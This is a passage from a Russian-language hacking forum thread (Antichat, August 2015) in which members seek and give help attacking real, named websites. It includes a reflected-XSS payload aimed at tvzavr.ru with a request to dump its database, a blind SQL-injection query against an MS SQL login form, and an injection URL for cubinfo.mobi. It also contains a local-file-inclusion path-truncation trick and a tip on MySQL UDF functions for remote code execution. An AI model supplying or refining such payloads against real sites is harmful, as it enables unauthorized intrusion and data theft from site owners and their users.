HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #461  
Старый 13.08.2015, 12:35
montag52
Guest
Сообщений: n/a
Провел на форуме:
4864

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

ребят вот нашёл сайт, и перейдя по правельной ссылки мне выдаёт файл config и там настройки подключения к бд
DATABASE HOSTNAME - есть
DATABASE USERNAME - есть
DATABASE PASSWORD - есть
DATABASE NAME - есть
DATABASE PORT - есть
И ещё асякие конфигурации там вроде даже есть привязка по IP адресам
Так вот в чём вопрос это считается серьёзной уязвимостью ? (если да то на сколько она серьёзная)
А какая СУБД?

Если MySQL, например, то не забудь про UDF функции, при помощи которых можно замутить RCE от имени пользователя СУБД на уровне ОС.
 
Ответить с цитированием

  #462  
Старый 13.08.2015, 16:07
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

В общем вот сайт http://www.tvzavr.ru/

Netsparker показывает уязвимости Netsparker

Cookie Not Marked as Secure

Cross-site Scripting -

.SpoilerTarget" type="button">Spoiler: Отчёт
Url http://www.tvzavr.ru/filmy?sort='"-->netsparker(0x00052A)

Parameter Name sort

Parameter Type GET

Attack Pattern '"-->netsparker(0x00052A)
Можно как нибудь слить BD или накасячить на сайте ?


 
Ответить с цитированием

  #463  
Старый 13.08.2015, 17:34
frank
Guest
Сообщений: n/a
Провел на форуме:
56887

Репутация: 28
По умолчанию

'nj

Цитата:
Сообщение от Sensoft  
Sensoft said:

В общем вот сайт
http://www.tvzavr.ru/
Netsparker показывает уязвимости Netsparker
Cookie Not Marked as Secure

Cross-site Scripting -


.SpoilerTarget" type="button">Spoiler: Отчёт
Url http://www.tvzavr.ru/filmy?sort='"-->netsparker(0x00052A)


.SpoilerTarget" type="button">Spoiler: Отчёт
Parameter Name sort

Parameter Type GET

Attack Pattern '"-->netsparker(0x00052A)
Можно как нибудь слить BD или накасячить на сайте ?

это означает что куки не имеют флага http-only, что означает возможность угона, в том числе авторизационной куки, если такая есть там, в случае наличия XSS уязвимости, с помощью JS скрипта.

Надеюсь достаточно полно получилось объяснить, если нет. прошу коллег подправить.

Что, захотелось себе на телевизор каналов бесплатно? не советую, так себе сервис и каналы не очень Это относительно самого сообщения.

То что под спойлером, похоже на указание наличия XSS, судя по всему отраженному.
 
Ответить с цитированием

  #464  
Старый 13.08.2015, 17:36
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

В общем вот сайт
http://www.tvzavr.ru/
Netsparker показывает уязвимости Netsparker
Cookie Not Marked as Secure

Cross-site Scripting -


.SpoilerTarget" type="button">Spoiler: Отчёт
Url http://www.tvzavr.ru/filmy?sort='"-->netsparker(0x00052A)


.SpoilerTarget" type="button">Spoiler: Отчёт
Parameter Name sort

Parameter Type GET

Attack Pattern '"-->netsparker(0x00052A)

Можно как нибудь слить BD или накасячить на сайте ?


для начала стоит прочитать что это за уязвимость и что позволяет сделать
 
Ответить с цитированием

  #465  
Старый 14.08.2015, 04:02
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

есть blind boolean based sql inj в поле авторизации

база - Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0

название базы достает, таблицы, колонки достает, а данные не хочет.

Помогите составить запрос.

' or ASCII(CAST(SUBSTRING((SELECT TOP 1 Login FROM Users),1,1) AS VARCHAR(8000)))>1-- ->false =не работает

Как достать данные?

Спасибо.
 
Ответить с цитированием

  #466  
Старый 14.08.2015, 04:07
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

Цитата:
Сообщение от wkar  
wkar said:

есть blind boolean based sql inj в поле авторизации
база - Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0
название базы достает, таблицы, колонки достает, а данные не хочет.
Помогите составить запрос.
' or ASCII(CAST(SUBSTRING((SELECT TOP 1 Login FROM Users),1,1) AS VARCHAR(8000)))>1-- ->false =не работает
Как достать данные?
Спасибо.
Походу колонка логин пуста о_О, потому что

ASCII(CAST(SUBSTRING((SELECT TOP 1 customer_type FROM Users),1,1) AS VARCHAR(8000)))>1-- -> TRUE

И там там только одна запись

Почему с остальных колонок не достает инфу ?
 
Ответить с цитированием

  #467  
Старый 14.08.2015, 11:21
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

http://cubinfo.mobi/view.php?id=616662','(select+version())

можно как-то инфу вывести?
 
Ответить с цитированием

  #468  
Старый 14.08.2015, 11:51
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:

http://cubinfo.mobi/view.php?id=616662','(select+version())
можно как-то инфу вывести?


 
Ответить с цитированием

  #469  
Старый 15.08.2015, 07:34
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954

Репутация: 32
По умолчанию

Есть код подруба языка

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]include([/COLOR][COLOR="#DD0000"]'languages/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'/index.php'[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
По дерикториям прыгать получается ?lang=en/../../ - такой запрос инклудит индексный файл в корне сайта), нулёвый байт не прокатит из за версии php

Может есть какие-то идейки?)
 
Ответить с цитированием

  #470  
Старый 15.08.2015, 12:17
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

ну как бы альтернатива нульбайта из /././././[4096]./.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ